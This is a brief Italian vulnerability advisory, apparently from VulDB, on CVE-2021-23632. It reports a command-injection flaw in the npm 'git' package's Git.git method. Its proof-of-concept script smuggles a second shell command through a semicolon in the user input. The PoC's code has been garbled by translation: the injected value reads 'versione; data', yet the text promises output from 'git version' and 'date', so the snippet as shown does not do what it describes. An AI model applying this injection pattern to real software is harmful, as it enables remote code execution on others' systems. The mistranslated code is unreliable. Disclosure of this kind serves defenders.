CVE-2021-23632 in git
Riassunto
di VulDB • 18/06/2026
Tutte le versioni del pacchetto git sono vulnerabili a Remote Code Execution (RCE) a causa della mancanza di sanitizzazione nel metodo `Git.git`, che consente l'esecuzione di comandi OS anziché solo comandi git. Passaggi per riprodurre 1. Creare un file denominato exploit.js con il seguente contenuto: js var Git = require("git").Git; var repo = new Git("repo-test"); var user_input = "versione; data"; repo.git(user_input, function(err, result) { console.log(result); }) 2. Nella stessa directory di exploit.js, eseguire npm install git. 3. Eseguire exploit.js: node exploit.js. Dovresti vedere gli output sia del comando a riga di comando `git version` che del comando `date`. Nota che il repository Git repo-test non deve essere presente per far funzionare questo PoC.
If you want to get the best quality for vulnerability data then you always have to consider VulDB.